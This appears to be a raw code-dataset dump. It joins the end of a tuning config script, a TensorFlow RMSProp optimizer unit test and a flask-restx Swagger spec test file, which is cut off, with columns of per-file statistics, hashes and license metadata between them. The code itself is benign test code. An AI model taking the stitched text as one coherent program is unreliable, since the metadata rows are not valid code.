# # "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# # "07-dim_char": 100,
# "17-lstm_layers": 2,
# "19-clip": 5,
# "21-lr_method": "sgd",
# "23-lr_decay": 0.9,
# "25-lr": 0.015,
# "27-decay_mode": "4normal",
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
})
if __name__ == "__main__":
main()
| 40.077947
| 89
| 0.415635
| 2,261
| 21,081
| 3.657674
| 0.080495
| 0.092866
| 0.162515
| 0.068924
| 0.859492
| 0.84994
| 0.839299
| 0.829504
| 0.820556
| 0.816324
| 0
| 0.09861
| 0.392439
| 21,081
| 525
| 90
| 40.154286
| 0.54708
| 0.680755
| 0
| 0.196078
| 0
| 0
| 0.036603
| 0.003462
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.137255
| 0
| 0.196078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed247929e7966abd23d3edf8e889759219a4ac74
| 8,471
|
py
|
Python
|
tensorflow/python/training/rmsprop_test.py
|
ln0119/tensorflow-fast-rcnn
|
e937e6394818c9a320754237651d7fe083b1020d
|
[
"Apache-2.0"
] | 73
|
2017-01-05T09:06:08.000Z
|
2021-11-06T14:00:50.000Z
|
tensorflow/python/training/rmsprop_test.py
|
minhhoai2/tensorflow
|
da88903d5e29230d68d861053aa1dea1432c0696
|
[
"Apache-2.0"
] | 8
|
2017-04-10T10:36:20.000Z
|
2021-02-07T01:02:32.000Z
|
tensorflow/python/training/rmsprop_test.py
|
minhhoai2/tensorflow
|
da88903d5e29230d68d861053aa1dea1432c0696
|
[
"Apache-2.0"
] | 151
|
2016-11-10T09:01:15.000Z
|
2022-01-18T08:13:49.000Z
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for rmsprop."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
import numpy as np
import tensorflow as tf
class RMSPropOptimizerTest(tf.test.TestCase):
def testWithoutMomentum(self):
for dtype in [tf.half, tf.float32]:
with self.test_session():
var0 = tf.Variable([1.0, 2.0], dtype=dtype)
var1 = tf.Variable([3.0, 4.0], dtype=dtype)
grads0 = tf.constant([0.1, 0.1], dtype=dtype)
grads1 = tf.constant([0.01, 0.01], dtype=dtype)
opt = tf.train.RMSPropOptimizer(learning_rate=2.0, decay=0.9,
momentum=0.0, epsilon=1.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
rms0 = opt.get_slot(var0, "rms")
self.assertTrue(rms0 is not None)
rms1 = opt.get_slot(var1, "rms")
self.assertTrue(rms1 is not None)
mom0 = opt.get_slot(var0, "momentum")
self.assertTrue(mom0 is not None)
mom1 = opt.get_slot(var1, "momentum")
self.assertTrue(mom1 is not None)
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: the rms accumulators where 1. So we should see a normal
# update: v -= grad * learning_rate
update.run()
# Check the root mean square accumulators.
self.assertAllCloseAccordingToType(np.array([0.901, 0.901]),
rms0.eval())
self.assertAllCloseAccordingToType(np.array([0.90001, 0.90001]),
rms1.eval())
# Check the parameters.
self.assertAllCloseAccordingToType(
np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0)),
2.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0))]),
var0.eval())
self.assertAllCloseAccordingToType(
np.array([3.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0)),
4.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0))]),
var1.eval())
# Step 2: the root mean square accumulators contain the previous update.
update.run()
# Check the rms accumulators.
self.assertAllCloseAccordingToType(
np.array([0.901*0.9+0.001, 0.901*0.9+0.001]), rms0.eval())
self.assertAllCloseAccordingToType(
np.array([0.90001*0.9+1e-5, 0.90001*0.9+1e-5]),
rms1.eval())
# Check the parameters.
self.assertAllCloseAccordingToType(
np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0))
- (0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1.0)),
2.0 - (0.1 * 2.0 / math.sqrt(0.901+1.0))
- (0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1.0))]),
var0.eval())
self.assertAllCloseAccordingToType(
np.array([3.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0))
- (0.01 * 2.0 / math.sqrt(0.90001*0.9+1e-5+1.0)),
4.0 - (0.01 * 2.0 / math.sqrt(0.90001+1.0))
- (0.01 * 2.0 / math.sqrt(0.90001*0.9+1e-5+1.0))]),
var1.eval())
def testWithMomentum(self):
for dtype in [tf.half, tf.float32]:
with self.test_session():
var0 = tf.Variable([1.0, 2.0], dtype=dtype)
var1 = tf.Variable([3.0, 4.0], dtype=dtype)
grads0 = tf.constant([0.1, 0.1], dtype=dtype)
grads1 = tf.constant([0.01, 0.01], dtype=dtype)
opt = tf.train.RMSPropOptimizer(learning_rate=2.0, decay=0.9,
momentum=0.5, epsilon=1e-5)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
rms0 = opt.get_slot(var0, "rms")
self.assertTrue(rms0 is not None)
rms1 = opt.get_slot(var1, "rms")
self.assertTrue(rms1 is not None)
mom0 = opt.get_slot(var0, "momentum")
self.assertTrue(mom0 is not None)
mom1 = opt.get_slot(var1, "momentum")
self.assertTrue(mom1 is not None)
# Fetch params to validate initial values
self.assertAllClose([1.0, 2.0], var0.eval())
self.assertAllClose([3.0, 4.0], var1.eval())
# Step 1: rms = 1, mom = 0. So we should see a normal
# update: v -= grad * learning_rate
update.run()
# Check the root mean square accumulators.
self.assertAllCloseAccordingToType(np.array([0.901, 0.901]),
rms0.eval())
self.assertAllCloseAccordingToType(np.array([0.90001, 0.90001]),
rms1.eval())
# Check the momentum accumulators
self.assertAllCloseAccordingToType(
np.array([(0.1 * 2.0 / math.sqrt(0.901+1e-5)),
(0.1 * 2.0 / math.sqrt(0.901+1e-5))]),
mom0.eval())
self.assertAllCloseAccordingToType(
np.array([(0.01 * 2.0/ math.sqrt(0.90001+1e-5)),
(0.01 * 2.0/ math.sqrt(0.90001+1e-5))]),
mom1.eval())
# Check that the parameters.
self.assertAllCloseAccordingToType(
np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5)),
2.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5))]),
var0.eval())
self.assertAllCloseAccordingToType(
np.array([3.0 - (0.01 * 2.0/ math.sqrt(0.90001+1e-5)),
4.0 - (0.01 * 2.0/ math.sqrt(0.90001+1e-5))]),
var1.eval())
# Step 2: the root mean square accumulators contain the previous update.
update.run()
# Check the rms accumulators.
self.assertAllCloseAccordingToType(
np.array([0.901*0.9+0.001, 0.901*0.9+0.001]),
rms0.eval())
self.assertAllCloseAccordingToType(
np.array([0.90001*0.9+1e-5, 0.90001*0.9+1e-5]),
rms1.eval())
self.assertAllCloseAccordingToType(
np.array([0.5 * (0.1 * 2.0 / math.sqrt(0.901+1e-5)) +
(0.1*2.0/math.sqrt(0.901*0.9+0.001+1e-5)),
0.5 * (0.1 * 2.0 / math.sqrt(0.901+1e-5)) +
(0.1*2.0/math.sqrt(0.901*0.9+0.001+1e-5))]),
mom0.eval())
self.assertAllCloseAccordingToType(
np.array([0.5 * (0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
(0.01 * 2.0 /math.sqrt(0.90001*0.9+2e-5)),
0.5 * (0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
(0.01 * 2.0 / math.sqrt(0.90001*0.9+2e-5))]),
mom1.eval())
# Check the parameters.
self.assertAllCloseAccordingToType(
np.array([1.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5)) - (0.5 * (
0.1 * 2.0 / math.sqrt(0.901+1e-5)) +(
0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1e-5))),
2.0 - (0.1 * 2.0 / math.sqrt(0.901+1e-5)) - (0.5 * (
0.1 * 2.0 / math.sqrt(0.901+1e-5)) +(
0.1 * 2.0 / math.sqrt(0.901*0.9+0.001+1e-5)))
]), var0.eval())
self.assertAllCloseAccordingToType(
np.array([3.0 - (0.01 * 2.0 / math.sqrt(0.90001+1e-5))
- (0.5 *(0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
(0.01 * 2.0 /math.sqrt(0.90001*0.9+2e-5))),
4.0 - (0.01 * 2.0 / math.sqrt(0.90001+1e-5))
- (0.5 *(0.01 * 2.0/ math.sqrt(0.90001+1e-5)) +
(0.01 * 2.0 / math.sqrt(0.90001*0.9+2e-5)))]),
var1.eval())
if __name__ == "__main__":
tf.test.main()
| 44.820106
| 80
| 0.523551
| 1,207
| 8,471
| 3.639602
| 0.135874
| 0.023674
| 0.054632
| 0.091054
| 0.818803
| 0.818803
| 0.806966
| 0.806966
| 0.79786
| 0.776007
| 0
| 0.142246
| 0.310353
| 8,471
| 188
| 81
| 45.058511
| 0.609723
| 0.157833
| 0
| 0.623188
| 0
| 0
| 0.007326
| 0
| 0
| 0
| 0
| 0
| 0.231884
| 1
| 0.014493
| false
| 0
| 0.043478
| 0
| 0.065217
| 0.007246
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ed42e638f862cac83e40b7017b61c738b23a506d
| 105,347
|
py
|
Python
|
tests/test_swagger.py
|
james-powis/flask-restx
|
ee1fc4ceb93887065b4785f14dadd70d7bc2efe7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_swagger.py
|
james-powis/flask-restx
|
ee1fc4ceb93887065b4785f14dadd70d7bc2efe7
|
[
"BSD-3-Clause"
] | 1
|
2020-02-12T11:22:16.000Z
|
2020-02-12T11:22:16.000Z
|
tests/test_swagger.py
|
james-powis/flask-restx
|
ee1fc4ceb93887065b4785f14dadd70d7bc2efe7
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import pytest
from textwrap import dedent
from flask import url_for, Blueprint
from werkzeug.datastructures import FileStorage
import flask_restx as restx
from flask_restx import inputs
class SwaggerTest(object):
def test_specs_endpoint(self, api, client):
data = client.get_specs("")
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["consumes"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
@pytest.mark.api(prefix="/api")
def test_specs_endpoint_with_prefix(self, api, client):
data = client.get_specs("/api")
assert data["swagger"] == "2.0"
assert data["basePath"] == "/api"
assert data["produces"] == ["application/json"]
assert data["consumes"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
def test_specs_endpoint_produces(self, api, client):
def output_xml(data, code, headers=None):
pass
api.representations["application/xml"] = output_xml
data = client.get_specs()
assert len(data["produces"]) == 2
assert "application/json" in data["produces"]
assert "application/xml" in data["produces"]
def test_specs_endpoint_info(self, app, client):
api = restx.Api(
version="1.0",
title="My API",
description="This is a testing API",
terms_url="http://somewhere.com/terms/",
contact="Support",
contact_url="http://support.somewhere.com",
contact_email="contact@somewhere.com",
license="Apache 2.0",
license_url="http://www.apache.org/licenses/LICENSE-2.0.html",
)
api.init_app(app)
data = client.get_specs()
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
assert data["info"]["title"] == "My API"
assert data["info"]["version"] == "1.0"
assert data["info"]["description"] == "This is a testing API"
assert data["info"]["termsOfService"] == "http://somewhere.com/terms/"
assert data["info"]["contact"] == {
"name": "Support",
"url": "http://support.somewhere.com",
"email": "contact@somewhere.com",
}
assert data["info"]["license"] == {
"name": "Apache 2.0",
"url": "http://www.apache.org/licenses/LICENSE-2.0.html",
}
def test_specs_endpoint_info_delayed(self, app, client):
api = restx.Api(version="1.0")
api.init_app(
app,
title="My API",
description="This is a testing API",
terms_url="http://somewhere.com/terms/",
contact="Support",
contact_url="http://support.somewhere.com",
contact_email="contact@somewhere.com",
license="Apache 2.0",
license_url="http://www.apache.org/licenses/LICENSE-2.0.html",
)
data = client.get_specs()
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
assert data["info"]["title"] == "My API"
assert data["info"]["version"] == "1.0"
assert data["info"]["description"] == "This is a testing API"
assert data["info"]["termsOfService"] == "http://somewhere.com/terms/"
assert data["info"]["contact"] == {
"name": "Support",
"url": "http://support.somewhere.com",
"email": "contact@somewhere.com",
}
assert data["info"]["license"] == {
"name": "Apache 2.0",
"url": "http://www.apache.org/licenses/LICENSE-2.0.html",
}
def test_specs_endpoint_info_callable(self, app, client):
api = restx.Api(
version=lambda: "1.0",
title=lambda: "My API",
description=lambda: "This is a testing API",
terms_url=lambda: "http://somewhere.com/terms/",
contact=lambda: "Support",
contact_url=lambda: "http://support.somewhere.com",
contact_email=lambda: "contact@somewhere.com",
license=lambda: "Apache 2.0",
license_url=lambda: "http://www.apache.org/licenses/LICENSE-2.0.html",
)
api.init_app(app)
data = client.get_specs()
assert data["swagger"] == "2.0"
assert data["basePath"] == "/"
assert data["produces"] == ["application/json"]
assert data["paths"] == {}
assert "info" in data
assert data["info"]["title"] == "My API"
assert data["info"]["version"] == "1.0"
assert data["info"]["description"] == "This is a testing API"
assert data["info"]["termsOfService"] == "http://somewhere.com/terms/"
assert data["info"]["contact"] == {
"name": "Support",
"url": "http://support.somewhere.com",
"email": "contact@somewhere.com",
}
assert data["info"]["license"] == {
"name": "Apache 2.0",
"url": "http://www.apache.org/licenses/LICENSE-2.0.html",
}
def test_specs_endpoint_no_host(self, app, client):
restx.Api(app)
data = client.get_specs("")
assert "host" not in data
assert data["basePath"] == "/"
@pytest.mark.options(server_name="api.restx.org")
def test_specs_endpoint_host(self, app, client):
# app.config['SERVER_NAME'] = 'api.restx.org'
restx.Api(app)
data = client.get_specs("")
assert data["host"] == "api.restx.org"
assert data["basePath"] == "/"
@pytest.mark.options(server_name="api.restx.org")
def test_specs_endpoint_host_with_url_prefix(self, app, client):
blueprint = Blueprint("api", __name__, url_prefix="/api/1")
restx.Api(blueprint)
app.register_blueprint(blueprint)
data = client.get_specs("/api/1")
assert data["host"] == "api.restx.org"
assert data["basePath"] == "/api/1"
@pytest.mark.options(server_name="restx.org")
def test_specs_endpoint_host_and_subdomain(self, app, client):
blueprint = Blueprint("api", __name__, subdomain="api")
restx.Api(blueprint)
app.register_blueprint(blueprint)
data = client.get_specs(base_url="http://api.restx.org")
assert data["host"] == "api.restx.org"
assert data["basePath"] == "/"
def test_specs_endpoint_tags_short(self, app, client):
restx.Api(app, tags=["tag-1", "tag-2", "tag-3"])
data = client.get_specs("")
assert data["tags"] == [{"name": "tag-1"}, {"name": "tag-2"}, {"name": "tag-3"}]
def test_specs_endpoint_tags_tuple(self, app, client):
restx.Api(
app, tags=[("tag-1", "Tag 1"), ("tag-2", "Tag 2"), ("tag-3", "Tag 3"),]
)
data = client.get_specs("")
assert data["tags"] == [
{"name": "tag-1", "description": "Tag 1"},
{"name": "tag-2", "description": "Tag 2"},
{"name": "tag-3", "description": "Tag 3"},
]
def test_specs_endpoint_tags_dict(self, app, client):
restx.Api(
app,
tags=[
{"name": "tag-1", "description": "Tag 1"},
{"name": "tag-2", "description": "Tag 2"},
{"name": "tag-3", "description": "Tag 3"},
],
)
data = client.get_specs("")
assert data["tags"] == [
{"name": "tag-1", "description": "Tag 1"},
{"name": "tag-2", "description": "Tag 2"},
{"name": "tag-3", "description": "Tag 3"},
]
@pytest.mark.api(tags=["ns", "tag"])
def test_specs_endpoint_tags_namespaces(self, api, client):
api.namespace("ns", "Description")
data = client.get_specs("")
assert data["tags"] == [{"name": "ns"}, {"name": "tag"}]
def test_specs_endpoint_invalid_tags(self, app, client):
api = restx.Api(app, tags=[{"description": "Tag 1"}])
client.get_specs("", status=500)
assert list(api.__schema__.keys()) == ["error"]
def test_specs_endpoint_default_ns_with_resources(self, app, client):
restx.Api(app)
data = client.get_specs("")
assert data["tags"] == []
def test_specs_endpoint_default_ns_without_resources(self, app, client):
api = restx.Api(app)
@api.route("/test", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [{"name": "default", "description": "Default namespace"}]
def test_specs_endpoint_default_ns_with_specified_ns(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns", "Test namespace")
@ns.route("/test2", endpoint="test2")
@api.route("/test", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [
{"name": "default", "description": "Default namespace"},
{"name": "ns", "description": "Test namespace"},
]
def test_specs_endpoint_specified_ns_without_default_ns(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test2")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [{"name": "ns", "description": "Test namespace"}]
def test_specs_endpoint_namespace_without_description(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns")
@ns.route("/test", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == [{"name": "ns"}]
def test_specs_endpoint_namespace_all_resources_hidden(self, app, client):
api = restx.Api(app)
ns = api.namespace("ns")
@ns.route("/test", endpoint="test", doc=False)
class TestResource(restx.Resource):
def get(self):
return {}
@ns.route("/test2", endpoint="test2")
@ns.hide
class TestResource2(restx.Resource):
def get(self):
return {}
@ns.route("/test3", endpoint="test3")
@ns.doc(False)
class TestResource3(restx.Resource):
def get(self):
return {}
data = client.get_specs("")
assert data["tags"] == []
def test_specs_authorizations(self, app, client):
authorizations = {"apikey": {"type": "apiKey", "in": "header", "name": "X-API"}}
restx.Api(app, authorizations=authorizations)
data = client.get_specs()
assert "securityDefinitions" in data
assert data["securityDefinitions"] == authorizations
@pytest.mark.api(prefix="/api")
def test_minimal_documentation(self, api, client):
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("/api")
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/ns/" in paths
assert "get" in paths["/ns/"]
op = paths["/ns/"]["get"]
assert op["tags"] == ["ns"]
assert op["operationId"] == "get_test_resource"
assert "parameters" not in op
assert "summary" not in op
assert "description" not in op
assert op["responses"] == {"200": {"description": "Success",}}
assert url_for("api.test") == "/api/ns/"
@pytest.mark.api(prefix="/api", version="1.0")
def test_default_ns_resource_documentation(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("/api")
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/test/" in paths
assert "get" in paths["/test/"]
op = paths["/test/"]["get"]
assert op["tags"] == ["default"]
assert op["responses"] == {"200": {"description": "Success",}}
assert len(data["tags"]) == 1
tag = data["tags"][0]
assert tag["name"] == "default"
assert tag["description"] == "Default namespace"
assert url_for("api.test") == "/api/test/"
@pytest.mark.api(default="site", default_label="Site namespace")
def test_default_ns_resource_documentation_with_override(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs()
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/test/" in paths
assert "get" in paths["/test/"]
op = paths["/test/"]["get"]
assert op["tags"] == ["site"]
assert op["responses"] == {"200": {"description": "Success",}}
assert len(data["tags"]) == 1
tag = data["tags"][0]
assert tag["name"] == "site"
assert tag["description"] == "Site namespace"
assert url_for("api.test") == "/test/"
@pytest.mark.api(prefix="/api")
def test_ns_resource_documentation(self, api, client):
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
data = client.get_specs("/api")
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/ns/" in paths
assert "get" in paths["/ns/"]
op = paths["/ns/"]["get"]
assert op["tags"] == ["ns"]
assert op["responses"] == {"200": {"description": "Success",}}
assert "parameters" not in op
assert len(data["tags"]) == 1
tag = data["tags"][-1]
assert tag["name"] == "ns"
assert tag["description"] == "Test namespace"
assert url_for("api.test") == "/api/ns/"
def test_ns_resource_documentation_lazy(self, app, client):
api = restx.Api()
ns = api.namespace("ns", "Test namespace")
@ns.route("/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
return {}
api.init_app(app)
data = client.get_specs()
paths = data["paths"]
assert len(paths.keys()) == 1
assert "/ns/" in paths
assert "get" in paths["/ns/"]
op = paths["/ns/"]["get"]
assert op["tags"] == ["ns"]
assert op["responses"] == {"200": {"description": "Success",}}
assert len(data["tags"]) == 1
tag = data["tags"][-1]
assert tag["name"] == "ns"
assert tag["description"] == "Test namespace"
assert url_for("test") == "/ns/"
def test_methods_docstring_to_summary(self, api, client):
@api.route("/test/", endpoint="test")
class TestResource(restx.Resource):
def get(self):
"""
GET operation
"""
return {}
def post(self):
"""POST operation.
Should be ignored
"""
return {}
def put(self):
"""PUT operation. Should be ignored"""
return {}
def delete(self):
"""
DELETE operation.
Should be ignored.
"""
return {}
data = client.get_specs()
path = data["paths"]["/test/"]
assert len(path.keys()) == 4
for method in path.keys():
operation = path[method]
assert method in ("get", "post", "put", "delete")
assert operation["summary"] == "{0} operation".format(method.upper())
assert operation["operationId"] == "{0}_test_resource".format(
method.lower()
)
# assert operation['parameters'] == []
def test_path_parameter_no_type(self, api, client):
@api.route("/id/<id>/", endpoint="by-id")
class ByIdResource(restx.Resource):
def get(self, id):
return {}
data = client.get_specs()
assert "/id/{id}/" in data["paths"]
path = data["paths"]["/id/{id}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "id"
assert parameter["type"] == "string"
assert parameter["in"] == "path"
assert parameter["required"] is True
def test_path_parameter_with_type(self, api, client):
@api.route("/name/<int:age>/", endpoint="by-name")
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
def test_path_parameter_with_type_with_argument(self, api, client):
@api.route("/name/<string(length=2):id>/", endpoint="by-name")
class ByNameResource(restx.Resource):
def get(self, id):
return {}
data = client.get_specs()
assert "/name/{id}/" in data["paths"]
path = data["paths"]["/name/{id}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "id"
assert parameter["type"] == "string"
assert parameter["in"] == "path"
assert parameter["required"] is True
def test_path_parameter_with_explicit_details(self, api, client):
@api.route(
"/name/<int:age>/",
endpoint="by-name",
doc={"params": {"age": {"description": "An age"}}},
)
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
def test_path_parameter_with_decorator_details(self, api, client):
@api.route("/name/<int:age>/")
@api.param("age", "An age")
class ByNameResource(restx.Resource):
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
assert parameter["description"] == "An age"
def test_expect_parser(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
parser.add_argument("jsonparam", type=str, location="json", help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 2
parameter = [o for o in op["parameters"] if o["in"] == "query"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
parameter = [o for o in op["parameters"] if o["in"] == "body"][0]
assert parameter["name"] == "payload"
assert parameter["required"]
assert parameter["in"] == "body"
assert parameter["schema"]["properties"]["jsonparam"]["type"] == "string"
def test_expect_parser_on_class(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
@api.expect(parser)
class WithParserResource(restx.Resource):
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
path = data["paths"]["/with-parser/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
def test_method_parser_on_class(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
@api.doc(get={"expect": parser})
class WithParserResource(restx.Resource):
def get(self):
return {}
def post(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "Some param"
op = data["paths"]["/with-parser/"]["post"]
assert "parameters" not in op
def test_parser_parameters_override(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
@api.doc(params={"param": {"description": "New description"}})
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "query"
assert parameter["description"] == "New description"
def test_parser_parameter_in_form(self, api, client):
parser = api.parser()
parser.add_argument("param", type=int, help="Some param", location="form")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "param"
assert parameter["type"] == "integer"
assert parameter["in"] == "formData"
assert parameter["description"] == "Some param"
assert op["consumes"] == [
"application/x-www-form-urlencoded",
"multipart/form-data",
]
def test_parser_parameter_in_files(self, api, client):
parser = api.parser()
parser.add_argument("in_files", type=FileStorage, location="files")
@api.route("/with-parser/", endpoint="with-parser")
class WithParserResource(restx.Resource):
@api.expect(parser)
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
op = data["paths"]["/with-parser/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "in_files"
assert parameter["type"] == "file"
assert parameter["in"] == "formData"
assert op["consumes"] == ["multipart/form-data"]
def test_parser_parameter_in_files_on_class(self, api, client):
parser = api.parser()
parser.add_argument("in_files", type=FileStorage, location="files")
@api.route("/with-parser/", endpoint="with-parser")
@api.expect(parser)
class WithParserResource(restx.Resource):
def get(self):
return {}
data = client.get_specs()
assert "/with-parser/" in data["paths"]
path = data["paths"]["/with-parser/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "in_files"
assert parameter["type"] == "file"
assert parameter["in"] == "formData"
assert "consumes" not in path
op = path["get"]
assert "consumes" in op
assert op["consumes"] == ["multipart/form-data"]
def test_explicit_parameters(self, api, client):
@api.route("/name/<int:age>/", endpoint="by-name")
class ByNameResource(restx.Resource):
@api.doc(
params={
"q": {
"type": "string",
"in": "query",
"description": "A query string",
}
}
)
def get(self, age):
return {}
data = client.get_specs()
assert "/name/{age}/" in data["paths"]
path = data["paths"]["/name/{age}/"]
assert len(path["parameters"]) == 1
parameter = path["parameters"][0]
assert parameter["name"] == "age"
assert parameter["type"] == "integer"
assert parameter["in"] == "path"
assert parameter["required"] is True
op = path["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "query"
assert parameter["description"] == "A query string"
def test_explicit_parameters_with_decorator(self, api, client):
@api.route("/name/")
class ByNameResource(restx.Resource):
@api.param("q", "A query string", type="string", _in="formData")
def get(self, age):
return {}
data = client.get_specs()
assert "/name/" in data["paths"]
op = data["paths"]["/name/"]["get"]
assert len(op["parameters"]) == 1
parameter = op["parameters"][0]
assert parameter["name"] == "q"
assert parameter["type"] == "string"
assert parameter["in"] == "formData"
